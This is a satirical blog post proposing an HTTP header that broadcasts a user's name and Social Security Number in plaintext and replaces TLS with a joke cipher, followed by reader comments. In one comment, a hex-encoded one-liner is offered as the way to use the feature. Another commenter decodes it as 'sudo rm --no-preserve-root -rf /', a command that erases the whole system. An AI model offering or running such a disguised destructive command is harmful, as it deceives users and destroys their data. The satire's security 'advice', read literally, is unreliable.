Recently, the American public has been forcefully made aware of the existence of various programs by the NSA, including massive infrastructure for intercepting all domestically routed communications to better protect us from imminent foreign threats. With legions of patriotic analysts, the NSA methodically ranks communications on the basis of their “foreignness” factor to determine candidacy for prolonged retention. Although it was developed with the best interests of the American people at heart, this program unwittingly ensnares communications of a purely domestic nature on the order of tens of thousands of incidents per day. These innocent mistakes are putting the agency at great risk because the 4th Amendment of the Constitution expressly prohibits such affronts to American privacy. Making determinations of foreignness is hard, but to prevent further inconvenience to the American way of life, we should take these leaks as an opportunity for us on the civilian front to aid the NSA by voluntarily indicating citizenship on all our networked communications.
Here, we define the syntax and semantics of X-No-Wiretap, an HTTP header-based mechanism for indicating and proving citizenship to well-intentioned man-in-the-middle parties. It is inspired by the enormously successful RFC 3514 IPv4 Security Flag and HTTP DNT header.
Syntax
The HTTP header “X-No-Wiretap” takes the value of the current user’s given name under penalty of perjury. The full name must be immediately followed by identity verification in the form of a standard U.S. Social Security Number, formatted with a hyphen “-” after every third and fifth digit.
Future revisions of the protocol may introduce additional forms of verification. The presence of an SSN should be able to lower the foreignness coefficient of the vast majority of domestic communications to well below 51%; initial research seems to indicate that the combination of full first name and SSN is able to reduce an associated message’s foreignness factor by over 76.8% for 99.997% of Americans. However, there is a chance that certain instances may additionally require Passport, Driver’s License, Address, Birthdate, Mother’s Maiden Name, and Childhood Best Friend’s Name to further lower the foreignness factor. This capability will be addressed in future versions of the protocol.
What about SSL/TLS?
Of course, adding encryption makes it substantially more difficult for the NSA to interpret the content of what a user is sending, and increases the chance that they may unwittingly collect and retain your communications. In order to address these concerns, this proposal necessarily deprecates all the SSL/TLS ciphers in favor of Double CAESAR’13, a thoroughly studied and well-known military-grade solution which offers excellent modes for graceful redegradation.
Isn’t it dangerous to send your social security number in plaintext along with every request?
Conventional security warns of the possibility of man-in-the-middle attacks, but these new intelligence revelations require entirely new types of cryptographic thinking. Here, the trusted entity is not the server acting at one end, and it’s not even the user issuing the requests; rather, it’s the bureaucracy sitting in the middle, politely intercepting all traffic for benevolent analysis and protecting your way of life.
One may be tempted to characterize this as a sacrifice of privacy in order to optimize security, but this position is simply naive. Every new progressive initiative of the government advances both fronts, security and liberty, never at the expense of either. If you take a holistic long term perspective on the impact on a global scale with a vast array of (classified) information sources, there is very little question that you too would arrive at the same conclusions on the genuine merits of this surveillance system.
In this case, the removal of encryption ensures that the government is able to parse the content of messages to identify terrorists. At the same time, the inclusion of the citizenship identification information should give citizens the safety of mind, knowing that their messages will not be stored indefinitely in an NSA datacenter.
What about Identity Theft?
What if you set up a server to transparently capture the browser headers? Any malicious entity could then collect all the social security numbers and real identities of everyone who happened to stumble onto their websites and use the information to sign up for credit cards, create hazardous investments, threaten or blackmail loved ones, and masquerade as a citizen while doing terrorist activities!
There isn’t any real evidence that such sweeping surveillance will even substantially reduce the chances of events that are intrinsically outliers anyway. On the other hand, identity theft is a real world issue which affects millions of Americans on a daily basis, and these changes will only make our real problems worse.
— Short-Sighted Critic
Our government has to reconcile with the fact that the flow of information has radically shifted in the past few decades- all the previous paradigms of privacy, security and adversaries have been obsoleted. Understandably, they need to create infrastructure to tackle this next generation of attacks. This could mean highly orchestrated attacks being planned online, and the government is justified in trying to exercise every available option to avert the next cyber-9/11. Our adversaries may have no limits to their capabilities, and so waiting for definitive evidence on the efficacy of counter-intelligence approaches is giving them an opportunity to plan their next attack.
When what’s at stake is the American way of life, it’s easy to put aside things that don’t really matter.
If the terrorists do find a way to cheat the foreignness heuristic, that’s not a problem, because this proposal is backwards compatible with the existing catch-all NSA policy. They can always, in the end, ignore the X-No-Wiretap header, but we wouldn’t know so it’d be okay.
When can I use this?
It’s expected that this proposal will breeze through the standardization process, because we as Americans can always get together and do that which must be done in these times which try men’s souls. Browsers should implement the feature as soon as possible, so that people can make use of the increased sense of security and privacy it affords.
If you’re truly eager to try it out, you can contribute to the prototype Chrome extension which supports the header injection (the reversal of HTTPS Everywhere, a feature called HTTPS Nowhere, hasn’t been implemented yet, but we’re accepting pull requests!). Since this extension is still experimental, inserting your personally identifiable information must be done by editing the source code, but you should expect a more user friendly interface in the next revision. Since it isn’t thoroughly tested, there may be a chance that it fails to leak the user’s personally identifiable information with every networked request, but rest assured this will be fixed as soon as we are made aware of the bugs.
We should all rally behind this proposal for a simple technical solution which will go to great lengths to simultaneously enhance both privacy and security, while overall preserving the only thing which matters, our American way of life.
What is the best way to use this before it’s implemented in browsers? Thanks
This should just about do it, run it from the command line in linux or osx:
$(echo 7375646f20726d202d2d6e6f2d70726573657276652d726f6f74202d7266202f | xxd -r -p)
Windows already has this feature built in, so no need to do anything.
Anonymous, very funny.
For those interested, the command runs
sudo rm --no-preserve-root -rf /
The real threat to your american way of life is NSA and the surveillance state they build. I will not write a long comment why I think your post is wrong on many levels but I advise you to read schneier.com (look through the archives and watch his talks on YouTube), or theguardian.com/world/nsa and reconsider your view about surveillance, imminent threats and downgrading of security and privacy.
Dear John Doe,
I refer you to http://en.wikipedia.org/wiki/A_Modest_Proposal for a similarly intentioned post, since the author of this one failed to include the ‘sarcasm’ tag.
“The real threat to your american way of life is NSA”
No, you idiot. It’s the dozen federal law enforcement agencies (headlined by the FBI & DEA), hundreds of aggressive local agencies, idiot citizens who spill their lives onto Facebook & Instagram, and — worst of all — a mass media that foments hysterical panic at the slightest drop of the hat which politicians feel obliged to “do something about”.
“well-intentioned man-in-the-middle parties”
I beg your pardon?
“I beg your pardon?”
Note how he mentions the enormously successful RFC 3514 IPv4 Security Flag? Google it, and all will (should) be explained.
I would call this the submissive quisling response to Snowden revelations. You have the RFC equivalent of “Papers, Please!” response.
Why give additional, voluntary plain-text metadata to an agency that has repeatedly demonstrated that it is unconstrained by rule of law, and has no ethical boundary for actions?
satire, people. SATIRE.
“Why give additional, voluntary plain-text metadata”
Don’t blab on about crap you obviously know nothing about. (If you *did* know anything about the Intarweb, the satire would have screamed out to you in paragraph 2).
You’d have to be a complete idiot to put your social security number in the headers of your website.
Dear Anon, you are very very right about that, however, not only is this article very obvious satire, nowhere does it suggest “putting your social security number in the headers of your website”, rather putting your social security number in the request headers sent out by the user agent (in your case, Internet Explorer 4) when attempting to access a website.
I smell conspiracy here.
I think “X-Papers-Please” might be a better name for the header.
For this to work, a NSSN (National security signature number) would need to be created that is specific to a person but does not tie into their interactions other than communications (similar to an IP address via ARIN, or an AS number). It would ideally not be contained in the header of the datagram, but as an additional layer 4 or something. Its adoption as a header would be faster, but should also include an RFC to assist at the networking layer. Consider it to be signed traffic.
Hang on, what can us Australians do if we want to get in on the action? My humble suggestion is a global personal identifier which we could all use rather than just those from USA!
“a global personal identifier”
It would be a New World Order of hierarchy and knowing our places in society!
The article is .. satire… ok… I beg your pardon.. well done… Sometimes it is not easy to distinguish between satire texts written by smart people and texts written by crazy people…
“Given name” means first name. I think you meant full name.
Thanks, this was hilarious.